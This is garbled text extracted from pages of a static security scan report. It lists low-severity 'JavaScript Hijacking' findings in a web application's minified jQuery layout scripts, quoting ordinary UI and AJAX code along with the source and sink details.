(t).each(function(){if(!$(this).attr("data-initialized")){var t;t=$(this).attr("data-height")?$
(this).attr("data-height"):$(this).css("height"),$(this).slimScroll({allowPageScroll:!
0,size:"7px",color:$(this).attr("data-handle-color")?$(this).attr("data-handle-
color"):"#bbb",wrapperClass:$(this).attr("data-wrapper-class")?$(this).attr("data-wrapper-
class"):"slimScrollDiv",railColor:$(this).attr("data-rail-color")?$(this).attr("data-rail-
color"):"#eaeaea",position:e?"left":"right",height:t,alwaysVisible:"1"==$(this).attr("data-
always-visible")?!0:!1,railVisible:"1"==$(this).attr("data-rail-visible")?!0:!
1,disableFadeOut:!0}),$(this).attr("data-initialized","1")}})},destroySlimScroll:function(t){$
(t).each(function(){if("1"===$(this).attr("data-initialized")){$(this).removeAttr("data-
initialized"),$(this).removeAttr("style");var t={};$(this).attr("data-handle-color")&&(t["data-
handle-color"]=$(this).attr("data-handle-color")),$(this).attr("data-wrapper-class")&&(t["data-
wrapper-class"]=$(this).attr("data-wrapper-class")),$(this).attr("data-rail-color")&&(t["data-
rail-color"]=$(this).attr("data-rail-color")),$(this).attr("data-always-visible")&&(t["data-
always-visible"]=$(this).attr("data-always-visible")),$(this).attr("data-rail-
visible")&&(t["data-rail-visible"]=$(this).attr("data-rail-visible")),$
(this).slimScroll({wrapperClass:$(this).attr("data-wrapper-class")?$(this).attr("data-wrapper-
class"):"slimScrollDiv",destroy:!0});var e=$(this);$.each(t,function(t,o)
{e.attr(t,o)})}})},scrollTop:function(){App.scrollTo()},blockUI:function(t){t=$.extend(!0,
{},t);var e="";if(e=t.animate?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><div class="block-spinner-bar"><div class="bounce1"></div><div class="bounce2"></
div><div class="bounce3"></div></div></div>':t.iconOnly?'<div class="loading-message '+
(t.boxed?"loading-message-boxed":"")+'"><img src="'+this.getGlobalImgPath()+'loading-spinner-
grey.gif" align=""></div>':t.textOnly?'<div class="loading-message '+(t.boxed?"loading-message-
boxed":"")+'"><span>  '+(t.message?t.message:"LOADING...")+"</span></div>":'<div
class="loading-message '+(t.boxed?"loading-message-boxed":"")+'"><img
src="'+this.getGlobalImgPath()+'loading-spinner-grey.gif" align=""><span>  '+
(t.message?t.message:"LOADING...")+"</span></div>",t.target){var o=$(t.target);o.height()<=$
(window).height()&&(t.cenrerY=!0),o.block({message:e,baseZ:t.zIndex?t.zIndex:1e3,centerY:void
0!==t.cenrerY?t.cenrerY:!1,css:
{backgroundColor:t.overlayColor?t.overlayColor:"#555",opacity:t.boxed?.05:.1,cursor:"wait"}})}
else $.blockUI({message:e,baseZ:t.zIndex?t.zIndex:1e3,css:
{border:"0",padding:"0",backgroundColor:"none"},overlayCSS:{backgroundColor:t.overlayColor?
t.overlayColor:"#555",opacity:t.boxed?.05:.1,cursor:"wait"}})},unblockUI:function(t){t?$
(t).unblock({onUnblock:function(){$(t).css("position",""),$(t).css("zoom","")}}):
$.unblockUI()},startPageLoading:function(t){t&&t.animate?($(".page-spinner-bar").remove(),$
("body").append('<div class="page-spinner-bar"><div class="bounce1"></div><div
class="bounce2"></div><div class="bounce3"></div></div>')):($(".page-loading").remove(),$
("body").append('<div class="page-loading"><img src="'+this.getGlobalImgPath()+'loading-
spinner-grey.gif"/>  <span>'+(t&&t.message?t.message:"Loading...")+"</span></
div>"))},stopPageLoading:function(){$(".page-loading, .page-spinner-
bar").remove()},alert:function(t){t=$.extend(!0,
{container:"",place:"append",type:"success",message:"",close:!0,reset:!0,focus:!
0,closeInSeconds:0,icon:""},t);var e=App.getUniqueID("App_alert"),o='<div id="'+e+'"
class="custom-alerts alert alert-'+t.type+' fade in">'+(t.close?'<button type="button"
class="close" data-dismiss="alert" aria-hidden="true"></button>':"")+(""!==t.icon?'<i
class="fa-lg fa fa-'+t.icon+'"></i> ':"")+t.message+"</div>";return t.reset&&$(".custom-
alerts").remove(),t.container?"append"==t.place?$(t.container).append(o):$
(t.container).prepend(o):1===$(".page-fixed-main-content").size()?$(".page-fixed-main-
content").prepend(o):($("body").hasClass("page-container-bg-solid")||$("body").hasClass("page-
content-white"))&&0===$(".page-head").size()?$(".page-title").after(o):$(".page-bar").size()>0?
$(".page-bar").after(o):$(".page-breadcrumb, .breadcrumbs").after(o),t.focus&&App.scrollTo($
(this).uniform())}):b()},updateUniform:function(t){$.uniform.update(t)},initFancybox:function()
{U()},getActualVal:function(t){return t=$
(t),t.val()===t.attr("placeholder")?"":t.val()},getURLParameter:function(t){var
Oct 5, 2018, 5:40 PM 90

+)if(o=i[e].split("="),o[0]==t)return unescape(o[1]);return null},isTouchDevice:function()

{try{return document.createEvent("TouchEvent"),!0}catch(t){return!1}},getViewPort:function()
{var t=window,e="inner";return"innerWidth"in window||(e="client",t=document.documentElement||
document.body),{width:t[e+"Width"],height:t[e+"Height"]}},getUniqueID:function(t)
{return"prefix_"+Math.floor(Math.random()*(new Date).getTime())},isIE8:function(){return
o},isIE9:function(){return a},isRTL:function(){return e},isAngularJsApp:function()
l},setAssetsPath:function(t){l=t},setGlobalImgPath:function(t){s=t},getGlobalImgPath:function()
{return l+s},setGlobalPluginsPath:function(t){r=t},getGlobalPluginsPath:function(){return l
+r},getGlobalCssPath:function(){return l+c},getBrandColor:function(t){return d[t]?
d[t]:""},getResponsiveBreakpoint:function(t){var e={xs:480,sm:768,md:992,lg:1200};return e[t]?
e[t]:0}}}();jQuery(document).ready(function(){App.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined
Package: Code.Sampoerna.Credit Life.5th Scan.20181005_CLS.CLS.assets.layouts.layout4.scripts

Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/
Low
scripts/layout.js, line 231 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Source Details
Source: Read type
From: lambda
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/s
cripts/layout.js:232
229 var the = $(this);
230
231 $.ajax({
232 type: "GET",
233 cache: false,
234 url: url,
Sink Details
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/scripts/layout.js:231
Oct 5, 2018, 5:40 PM 91

Low
228
229 var the = $(this);
230
231 $.ajax({
232 type: "GET",
233 cache: false,
234 url: url,

Low
Issue Details
Source Details
Source: Read type
From: lambda
cripts/layout.js:270
267 }
268
269 $.ajax({
270 type: "GET",
271 cache: false,
272 url: url,
Sink Details
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/scripts/layout.js:269
266 $('.page-header .responsive-toggler').click();
267 }
268
269 $.ajax({
270 type: "GET",
271 cache: false,
272 url: url,
Oct 5, 2018, 5:40 PM 92

Low
scripts/layout.min.js, line 1 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Source Details
Source: Read type
From: lambda
cripts/layout.min.js:1
1 var Layout=function(){var e="layouts/layout4/img/",a="layouts/layout4/
css/",s=App.getResponsiveBreakpoint("md"),i=function(){var e,a=$(".page-
content"),i=$(".page-sidebar"),t=$("body");if(t.hasClass("page-footer-
fixed")===!0&&t.hasClass("page-sidebar-fixed")===!1){var
o=App.getViewPort().height-$(".page-footer").outerHeight(!0)-$(".page-
header").outerHeight(!0);a.height()<o&&a.attr("style","min-height:"+o+"px")}
else{if(t.hasClass("page-sidebar-fixed"))e=n()-10,t.hasClass("page-footer-
fixed")===!1&&(e-=$(".page-footer").outerHeight(!0));else{var r=$(".page-
header").outerHeight(!0),p=$(".page-footer").outerHeight(!
0);e=App.getViewPort().width<s?App.getViewPort().height-r-p:i.height()-10,e+r
+p<=App.getViewPort().height&&(e=App.getViewPort().height-r-p-45)}
a.attr("style","min-height:"+e+"px")}},t=function(e,a){var
i=location.hash.toLowerCase(),t=$(".page-sidebar-
menu");if("click"===e||"set"===e?a=$(a):"match"===e&&t.find("li >
a").each(function(){var e=$(this).attr("href").toLowerCase();return
e.length>1&&i.substr(1,e.length-1)==e.substr(1)?void(a=$(this)):void 0}),a&&0!
=a.size()&&"javascript:;"!==a.attr("href").toLowerCase()&&"#"!
==a.attr("href").toLowerCase()){parseInt(t.data("slide-speed")),t.data("keep-
expanded");t.hasClass("page-sidebar-menu-hover-submenu")===!1?t.find("li.nav-
item.open").each(function(){var e=!1;$(this).find("li").each(function()
{return $(this).find(" > a").attr("href")===a.attr("href")?void(e=!0):void
0}),e!==!0&&($(this).removeClass("open"),$(this).find("> a
> .arrow.open").removeClass("open"),$(this).find("> .sub-
menu").slideUp())}):t.find("li.open").removeClass("open"),t.find("li.active").removeCl
> a > .selected").remove(),a.parents("li").each(function(){$
(this).addClass("active"),$(this).find("> a > span.arrow").addClass("open"),
1===$(this).parent("ul.page-sidebar-menu").size()&&$(this).find(">
a").append('<span class="selected"></span>'),1===$(this).children("ul.sub-
menu").size()&&$
(this).addClass("open")}),"click"===e&&App.getViewPort().width<s&&$(".page-
sidebar").hasClass("in")&&$(".page-header .responsive-
toggler").click()}},o=function(){$(".page-sidebar").on("click","li >
a",function(e){if(!(App.getViewPort().width>=s&&1===$(this).parents(".page-
sidebar-menu-hover-submenu").size())){if($(this).next().hasClass("sub-
menu")===!1)return void(App.getViewPort().width<s&&$(".page-
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click());var
a=$(this).parent().parent(),t=$(this),o=$(".page-sidebar-menu"),n=$
(this).next(),r=o.data("auto-scroll"),p=parseInt(o.data("slide-
Oct 5, 2018, 5:40 PM 93

scripts/layout.min.js, line 1 (JavaScript Hijacking: Vulnerable Framework) Low
speed")),d=o.data("keep-expanded");d!==!
0&&(a.children("li.open").children("a").children(".arrow").removeClass("open"),a.child
menu:not(.always-
open)").slideUp(p),a.children("li.open").removeClass("open"));var
l=-200;n.is(":visible")?($(".arrow",$(this)).removeClass("open"),$
(this).parent().removeClass("open"),n.slideUp(p,function(){r===!0&&$
("body").hasClass("page-sidebar-closed")===!1&&($("body").hasClass("page-
sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})):($
(".arrow",$(this)).addClass("open"),$
(this).parent().addClass("open"),n.slideDown(p,function(){r===!0&&$
sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})),e.preventDefault()
$(".page-sidebar-menu li > a").on("click",function(e)
{App.getViewPort().width<s&&$(this).next().hasClass("sub-menu")===!1&&$
(".page-header .responsive-toggler").click()}),$(".page-
sidebar").on("click"," li > a.ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=$(".page-
sidebar ul"),t=($(".page-content"),$(".page-content .page-content-
body"));i.children("li.active").removeClass("active"),i.children("arrow.open").removeC
$(this).parents("li").each(function(){$(this).addClass("active"),$
(this).children("a > span.arrow").addClass("open")}),$
(this).parents("li").addClass("active"),App.getViewPort().width<s&&$(".page-
toggler").click(),App.startPageLoading();var o=$(this);
$.ajax({type:"GET",cache:!1,url:a,dataType:"html",success:function(e)
{0===o.parents("li.open").size()&&$(".page-sidebar-menu > li.open >
a").click(),App.stopPageLoading(),t.html(e),Layout.fixContentHeight(),App.initAjax()},
{App.stopPageLoading(),t.html("<h4>Could not load the requested content.</
h4>")}})}),$(".page-content").on("click",".ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=($(".page-
content"),$(".page-content .page-content-
body"));App.startPageLoading(),App.getViewPort().width<s&&$(".page-
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click(),
{App.stopPageLoading(),i.html(e),Layout.fixContentHeight(),App.initAjax()},error:funct
{i.html("<h4>Could not load the requested content.</
h4>"),App.stopPageLoading()}})}),$(document).on("click",".page-header-fixed-
mobile .responsive-toggler",function(){App.scrollTop()})},n=function(){var
e=App.getViewPort().height-$(".page-header").outerHeight(!0)-40;return $
("body").hasClass("page-footer-fixed")&&(e-=$(".page-
footer").outerHeight()),e},r=function(){var e=$(".page-sidebar-menu");return
App.destroySlimScroll(e),0===$(".page-sidebar-fixed").size()?void
i():void(App.getViewPort().width>=s&&(e.attr("data-
height",n()),App.initSlimScroll(e),i()))},p=function(){var e=$
("body");e.hasClass("page-sidebar-fixed")&&$(".page-
sidebar").on("mouseenter",function(){e.hasClass("page-sidebar-closed")&&$
Oct 5, 2018, 5:40 PM 94

(this).find(".page-sidebar-menu").removeClass("page-sidebar-menu-
closed")}).on("mouseleave",function(){e.hasClass("page-sidebar-closed")&&$
(this).find(".page-sidebar-menu").addClass("page-sidebar-menu-
closed")})},d=function(){var e=$("body");$.cookie&&"1"===
$.cookie("sidebar_closed")&&App.getViewPort().width>=s&&($
("body").addClass("page-sidebar-closed"),$(".page-sidebar-
menu").addClass("page-sidebar-menu-closed")),$("body").on("click",".sidebar-
toggler",function(a){var s=$(".page-sidebar"),i=$(".page-sidebar-menu");$
(".sidebar-search",s).removeClass("open"),e.hasClass("page-sidebar-closed")?
(e.removeClass("page-sidebar-closed"),i.removeClass("page-sidebar-menu-
closed"),$.cookie&&$.cookie("sidebar_closed","0")):(e.addClass("page-sidebar-
closed"),i.addClass("page-sidebar-menu-closed"),e.hasClass("page-sidebar-
fixed")&&i.trigger("mouseleave"),$.cookie&&$.cookie("sidebar_closed","1")),$
(window).trigger("resize")}),p(),$(".page-sidebar").on("click",".sidebar-
search .remove",function(e){e.preventDefault(),$(".sidebar-
search").removeClass("open")}),$(".page-sidebar .sidebar-
search").on("keypress","input.form-control",function(e){return 13==e.which?($
(".sidebar-search").submit(),!1):void 0}),$(".sidebar-
search .submit").on("click",function(e){e.preventDefault(),$
("body").hasClass("page-sidebar-closed")&&$(".sidebar-
search").hasClass("open")===!1?(1===$(".page-sidebar-fixed").size()&&$(".page-
sidebar .sidebar-toggler").click(),$(".sidebar-search").addClass("open")):$
(".sidebar-search").submit()}),0!==$(".sidebar-search").size()&&($(".sidebar-
search .input-group").on("click",function(e){e.stopPropagation()}),$
("body").on("click",function(){$(".sidebar-search").hasClass("open")&&$
(".sidebar-search").removeClass("open")}))},l=function(){$(".page-
header").on("click",".search-form",function(e){$(this).addClass("open"),$
(this).find(".form-control").focus(),$(".page-header .search-form .form-
control").on("blur",function(e){$(this).closest(".search-
form").removeClass("open"),$(this).unbind("blur")})}),$(".page-
header").on("keypress",".hor-menu .search-form .form-control",function(e)
{return 13==e.which?($(this).closest(".search-form").submit(),!1):void 0}),$
(".page-header").on("mousedown",".search-form.open .submit",function(e)
{e.preventDefault(),e.stopPropagation(),$(this).closest(".search-
form").submit()})},c=function(){var e=300,a=500;navigator.userAgent.match(/
iPhone|iPad|iPod/i)?$(window).bind("touchend touchcancel
touchleave",function(s){$(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$
(".scroll-to-top").fadeOut(a)}):$(window).scroll(function(){$
(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$(".scroll-to-
top").fadeOut(a)}),$(".scroll-to-top").click(function(e){return
e.preventDefault(),$("html, body").animate({scrollTop:0},a),!
1})};return{initHeader:function(){l()},setSidebarMenuActiveLink:function(e,a)
{t(e,a)},initSidebar:function()
{r(),o(),d(),App.isAngularJsApp()&&t("match"),App.addResizeHandler(r)},initContent:fun
{},initFooter:function(){c()},init:function()
{this.initHeader(),this.initSidebar(),this.initContent(),this.initFooter()},fixContent
{},initFixedSidebarHoverEffect:function(){p()},initFixedSidebar:function()
{r()},getLayoutImgPath:function(){return App.getAssetsPath()
Oct 5, 2018, 5:40 PM 95

+e},getLayoutCssPath:function(){return App.getAssetsPath()+a}}}
();App.isAngularJsApp()===!1&&jQuery(document).ready(function()
{Layout.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined
Sink Details
Sink: ajax(0)
File: Code/Sampoerna/Credit Life/5th Scan/20181005_CLS/CLS/assets/layouts/layout4/scripts/layout.min.js:1
css/",s=App.getResponsiveBreakpoint("md"),i=function(){var e,a=$(".page-content"),i=$(".page-
sidebar"),t=$("body");if(t.hasClass("page-footer-fixed")===!0&&t.hasClass("page-sidebar-
fixed")===!1){var o=App.getViewPort().height-$(".page-footer").outerHeight(!0)-$(".page-
else{if(t.hasClass("page-sidebar-fixed"))e=n()-10,t.hasClass("page-footer-fixed")===!1&&(e-=$
(".page-footer").outerHeight(!0));else{var r=$(".page-header").outerHeight(!0),p=$(".page-
footer").outerHeight(!0);e=App.getViewPort().width<s?App.getViewPort().height-r-
p:i.height()-10,e+r+p<=App.getViewPort().height&&(e=App.getViewPort().height-r-p-45)}
a.attr("style","min-height:"+e+"px")}},t=function(e,a){var i=location.hash.toLowerCase(),t=$
(".page-sidebar-menu");if("click"===e||"set"===e?a=$(a):"match"===e&&t.find("li >
=a.size()&&"javascript:;"!==a.attr("href").toLowerCase()&&"#"!==a.attr("href").toLowerCase())
{parseInt(t.data("slide-speed")),t.data("keep-expanded");t.hasClass("page-sidebar-menu-hover-
submenu")===!1?t.find("li.nav-item.open").each(function(){var e=!1;$
(this).find("li").each(function(){return $(this).find(" > a").attr("href")===a.attr("href")?
void(e=!0):void 0}),e!==!0&&($(this).removeClass("open"),$(this).find("> a
menu").slideUp())}):t.find("li.open").removeClass("open"),t.find("li.active").removeClass("active"),t.fin
> a > .selected").remove(),a.parents("li").each(function(){$(this).addClass("active"),$
(this).find("> a > span.arrow").addClass("open"),1===$(this).parent("ul.page-sidebar-
menu").size()&&$(this).find("> a").append('<span class="selected"></span>'),1===$
(this).children("ul.sub-menu").size()&&$
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click()}},o=function(){$
(".page-sidebar").on("click","li > a",function(e){if(!(App.getViewPort().width>=s&&1===$
(this).parents(".page-sidebar-menu-hover-submenu").size())){if($(this).next().hasClass("sub-
menu")===!1)return void(App.getViewPort().width<s&&$(".page-sidebar").hasClass("in")&&$(".page-
header .responsive-toggler").click());var a=$(this).parent().parent(),t=$(this),o=$(".page-
sidebar-menu"),n=$(this).next(),r=o.data("auto-scroll"),p=parseInt(o.data("slide-
0&&(a.children("li.open").children("a").children(".arrow").removeClass("open"),a.children("li.open").chil
menu:not(.always-open)").slideUp(p),a.children("li.open").removeClass("open"));var
(this).parent().removeClass("open"),n.slideUp(p,function(){r===!0&&$("body").hasClass("page-
sidebar-closed")===!1&&($("body").hasClass("page-sidebar-fixed")?
Oct 5, 2018, 5:40 PM 96

o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})):($(".arrow",$
(this)).addClass("open"),$(this).parent().addClass("open"),n.slideDown(p,function(){r===!0&&$
("body").hasClass("page-sidebar-closed")===!1&&($("body").hasClass("page-sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})),e.preventDefault()}}),App.isAngularJs
$(".page-sidebar-menu li > a").on("click",function(e){App.getViewPort().width<s&&$
(this).next().hasClass("sub-menu")===!1&&$(".page-header .responsive-toggler").click()}),$
(".page-sidebar").on("click"," li > a.ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=$(".page-sidebar ul"),t=($
(".page-content"),$(".page-content .page-content-
body"));i.children("li.active").removeClass("active"),i.children("arrow.open").removeClass("open"),
$(this).parents("li").each(function(){$(this).addClass("active"),$(this).children("a >
span.arrow").addClass("open")}),$
toggler").click(),App.startPageLoading();var o=$(this);$.ajax({type:"GET",cache:!
1,url:a,dataType:"html",success:function(e){0===o.parents("li.open").size()&&$(".page-sidebar-
menu > li.open >
a").click(),App.stopPageLoading(),t.html(e),Layout.fixContentHeight(),App.initAjax()},error:function(e,a,
{App.stopPageLoading(),t.html("<h4>Could not load the requested content.</h4>")}})}),$(".page-
content").on("click",".ajaxify",function(e){e.preventDefault(),App.scrollTop();var a=$
(this).attr("href"),i=($(".page-content"),$(".page-content .page-content-
body"));App.startPageLoading(),App.getViewPort().width<s&&$(".page-sidebar").hasClass("in")&&$
(".page-header .responsive-toggler").click(),$.ajax({type:"GET",cache:!
1,url:a,dataType:"html",success:function(e)
{App.stopPageLoading(),i.html(e),Layout.fixContentHeight(),App.initAjax()},error:function(e,a,s)
{i.html("<h4>Could not load the requested content.</h4>"),App.stopPageLoading()}})}),$
(document).on("click",".page-header-fixed-mobile .responsive-toggler",function()
{App.scrollTop()})},n=function(){var e=App.getViewPort().height-$(".page-header").outerHeight(!
0)-40;return $("body").hasClass("page-footer-fixed")&&(e-=$(".page-
height",n()),App.initSlimScroll(e),i()))},p=function(){var e=$("body");e.hasClass("page-
sidebar-fixed")&&$(".page-sidebar").on("mouseenter",function(){e.hasClass("page-sidebar-
closed")&&$(this).find(".page-sidebar-menu").removeClass("page-sidebar-menu-
closed")}).on("mouseleave",function(){e.hasClass("page-sidebar-closed")&&$(this).find(".page-
sidebar-menu").addClass("page-sidebar-menu-closed")})},d=function(){var e=$("body");
$.cookie&&"1"===$.cookie("sidebar_closed")&&App.getViewPort().width>=s&&($
("body").addClass("page-sidebar-closed"),$(".page-sidebar-menu").addClass("page-sidebar-menu-
closed")),$("body").on("click",".sidebar-toggler",function(a){var s=$(".page-sidebar"),i=$
(".page-sidebar-menu");$(".sidebar-search",s).removeClass("open"),e.hasClass("page-sidebar-
closed")?(e.removeClass("page-sidebar-closed"),i.removeClass("page-sidebar-menu-closed"),
$.cookie&&$.cookie("sidebar_closed","0")):(e.addClass("page-sidebar-closed"),i.addClass("page-
sidebar-menu-closed"),e.hasClass("page-sidebar-fixed")&&i.trigger("mouseleave"),$.cookie&&
$.cookie("sidebar_closed","1")),$(window).trigger("resize")}),p(),$(".page-
sidebar").on("click",".sidebar-search .remove",function(e){e.preventDefault(),$(".sidebar-
search").removeClass("open")}),$(".page-sidebar .sidebar-search").on("keypress","input.form-
control",function(e){return 13==e.which?($(".sidebar-search").submit(),!1):void 0}),$
(".sidebar-search .submit").on("click",function(e){e.preventDefault(),$("body").hasClass("page-
sidebar-closed")&&$(".sidebar-search").hasClass("open")===!1?(1===$(".page-sidebar-
fixed").size()&&$(".page-sidebar .sidebar-toggler").click(),$(".sidebar-
search").addClass("open")):$(".sidebar-search").submit()}),0!==$(".sidebar-search").size()&&($
(".sidebar-search .input-group").on("click",function(e){e.stopPropagation()}),$
("body").on("click",function(){$(".sidebar-search").hasClass("open")&&$(".sidebar-
search").removeClass("open")}))},l=function(){$(".page-header").on("click",".search-
form",function(e){$(this).addClass("open"),$(this).find(".form-control").focus(),$(".page-
header .search-form .form-control").on("blur",function(e){$(this).closest(".search-
form").removeClass("open"),$(this).unbind("blur")})}),$(".page-header").on("keypress",".hor-
menu .search-form .form-control",function(e){return 13==e.which?($(this).closest(".search-
Oct 5, 2018, 5:40 PM 97

form").submit(),!1):void 0}),$(".page-header").on("mousedown",".search-
form.open .submit",function(e){e.preventDefault(),e.stopPropagation(),$(this).closest(".search-
form").submit()})},c=function(){var e=300,a=500;navigator.userAgent.match(/iPhone|iPad|iPod/i)?
$(window).bind("touchend touchcancel touchleave",function(s){$(this).scrollTop()>e?$(".scroll-
to-top").fadeIn(a):$(".scroll-to-top").fadeOut(a)}):$(window).scroll(function(){$
(this).scrollTop()>e?$(".scroll-to-top").fadeIn(a):$(".scroll-to-top").fadeOut(a)}),$(".scroll-
to-top").click(function(e){return e.preventDefault(),$("html, body").animate({scrollTop:0},a),!
{r(),o(),d(),App.isAngularJsApp()&&t("match"),App.addResizeHandler(r)},initContent:function()
{this.initHeader(),this.initSidebar(),this.initContent(),this.initFooter()},fixContentHeight:function()
{r()},getLayoutImgPath:function(){return App.getAssetsPath()+e},getLayoutCssPath:function()
{return App.getAssetsPath()+a}}}();App.isAngularJsApp()===!1&&jQuery(document).ready(function()
{Layout.init()});
2
3 undefined
4 undefined
5 undefined
6 undefined
7 undefined

Low
scripts/layout.min.js, line 1 (JavaScript Hijacking: Vulnerable Framework)
Issue Details
Source Details
Source: Read type
From: lambda
cripts/layout.min.js:1
css/",s=App.getResponsiveBreakpoint("md"),i=function(){var e,a=$(".page-
content"),i=$(".page-sidebar"),t=$("body");if(t.hasClass("page-footer-
fixed")===!0&&t.hasClass("page-sidebar-fixed")===!1){var
o=App.getViewPort().height-$(".page-footer").outerHeight(!0)-$(".page-
else{if(t.hasClass("page-sidebar-fixed"))e=n()-10,t.hasClass("page-footer-
fixed")===!1&&(e-=$(".page-footer").outerHeight(!0));else{var r=$(".page-
header").outerHeight(!0),p=$(".page-footer").outerHeight(!
0);e=App.getViewPort().width<s?App.getViewPort().height-r-p:i.height()-10,e+r
+p<=App.getViewPort().height&&(e=App.getViewPort().height-r-p-45)}
a.attr("style","min-height:"+e+"px")}},t=function(e,a){var
i=location.hash.toLowerCase(),t=$(".page-sidebar-
menu");if("click"===e||"set"===e?a=$(a):"match"===e&&t.find("li >
Oct 5, 2018, 5:40 PM 98

=a.size()&&"javascript:;"!==a.attr("href").toLowerCase()&&"#"!
==a.attr("href").toLowerCase()){parseInt(t.data("slide-speed")),t.data("keep-
expanded");t.hasClass("page-sidebar-menu-hover-submenu")===!1?t.find("li.nav-
item.open").each(function(){var e=!1;$(this).find("li").each(function()
{return $(this).find(" > a").attr("href")===a.attr("href")?void(e=!0):void
0}),e!==!0&&($(this).removeClass("open"),$(this).find("> a
menu").slideUp())}):t.find("li.open").removeClass("open"),t.find("li.active").removeCl
> a > .selected").remove(),a.parents("li").each(function(){$
(this).addClass("active"),$(this).find("> a > span.arrow").addClass("open"),
1===$(this).parent("ul.page-sidebar-menu").size()&&$(this).find(">
a").append('<span class="selected"></span>'),1===$(this).children("ul.sub-
menu").size()&&$
toggler").click()}},o=function(){$(".page-sidebar").on("click","li >
a",function(e){if(!(App.getViewPort().width>=s&&1===$(this).parents(".page-
sidebar-menu-hover-submenu").size())){if($(this).next().hasClass("sub-
menu")===!1)return void(App.getViewPort().width<s&&$(".page-
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click());var
a=$(this).parent().parent(),t=$(this),o=$(".page-sidebar-menu"),n=$
(this).next(),r=o.data("auto-scroll"),p=parseInt(o.data("slide-
0&&(a.children("li.open").children("a").children(".arrow").removeClass("open"),a.child
menu:not(.always-
open)").slideUp(p),a.children("li.open").removeClass("open"));var
(this).parent().removeClass("open"),n.slideUp(p,function(){r===!0&&$
sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})):($
(".arrow",$(this)).addClass("open"),$
(this).parent().addClass("open"),n.slideDown(p,function(){r===!0&&$
sidebar-fixed")?
o.slimScroll({scrollTo:t.position().top}):App.scrollTo(t,l)),i()})),e.preventDefault()
$(".page-sidebar-menu li > a").on("click",function(e)
{App.getViewPort().width<s&&$(this).next().hasClass("sub-menu")===!1&&$
(".page-header .responsive-toggler").click()}),$(".page-
sidebar").on("click"," li > a.ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=$(".page-
sidebar ul"),t=($(".page-content"),$(".page-content .page-content-
body"));i.children("li.active").removeClass("active"),i.children("arrow.open").removeC
$(this).parents("li").each(function(){$(this).addClass("active"),$
(this).children("a > span.arrow").addClass("open")}),$
Oct 5, 2018, 5:40 PM 99

toggler").click(),App.startPageLoading();var o=$(this);
{0===o.parents("li.open").size()&&$(".page-sidebar-menu > li.open >
a").click(),App.stopPageLoading(),t.html(e),Layout.fixContentHeight(),App.initAjax()},
{App.stopPageLoading(),t.html("<h4>Could not load the requested content.</
h4>")}})}),$(".page-content").on("click",".ajaxify",function(e)
{e.preventDefault(),App.scrollTop();var a=$(this).attr("href"),i=($(".page-
content"),$(".page-content .page-content-
body"));App.startPageLoading(),App.getViewPort().width<s&&$(".page-
sidebar").hasClass("in")&&$(".page-header .responsive-toggler").click(),
{App.stopPageLoading(),i.html(e),Layout.fixContentHeight(),App.initAjax()},error:funct
{i.html("<h4>Could not load the requested content.</
h4>"),App.stopPageLoading()}})}),$(document).on("click",".page-header-fixed-
mobile .responsive-toggler",function(){App.scrollTop()})},n=function(){var
e=App.getViewPort().height-$(".page-header").outerHeight(!0)-40;return $
("body").hasClass("page-footer-fixed")&&(e-=$(".page-
height",n()),App.initSlimScroll(e),i()))},p=function(){var e=$
("body");e.hasClass("page-sidebar-fixed")&&$(".page-
sidebar").on("mouseenter",function(){e.hasClass("page-sidebar-closed")&&$
(this).find(".page-sidebar-menu").removeClass("page-sidebar-menu-
closed")}).on("mouseleave",function(){e.hasClass("page-sidebar-closed")&&$
(this).find(".page-sidebar-menu").addClass("page-sidebar-menu-
closed")})},d=function(){var e=$("body");$.cookie&&"1"===
$.cookie("sidebar_closed")&&App.getViewPort().width>=s&&($
("body").addClass("page-sidebar-closed"),$(".page-sidebar-
menu").addClass("page-sidebar-menu-closed")),$("body").on("click",".sidebar-
toggler",function(a){var s=$(".page-sidebar"),i=$(".page-sidebar-menu");$
(".sidebar-search",s).removeClass("open"),e.hasClass("page-sidebar-closed")?
(e.removeClass("page-sidebar-closed"),i.removeClass("page-sidebar-menu-
closed"),$.cookie&&$.cookie("sidebar_closed","0")):(e.addClass("page-sidebar-
closed"),i.addClass("page-sidebar-menu-closed"),e.hasClass("page-sidebar-
fixed")&&i.trigger("mouseleave"),$.cookie&&$.cookie("sidebar_closed","1")),$
(window).trigger("resize")}),p(),$(".page-sidebar").on("click",".sidebar-
search .remove",function(e){e.preventDefault(),$(".sidebar-
search").removeClass("open")}),$(".page-sidebar .sidebar-
search").on("keypress","input.form-control",function(e){return 13==e.which?($
(".sidebar-search").submit(),!1):void 0}),$(".sidebar-
search .submit").on("click",function(e){e.preventDefault(),$
("body").hasClass("page-sidebar-closed")&&$(".sidebar-
search").hasClass("open")===!1?(1===$(".page-sidebar-fixed").size()&&$(".page-
sidebar .sidebar-toggler").click(),$(".sidebar-search").addClass("open")):$
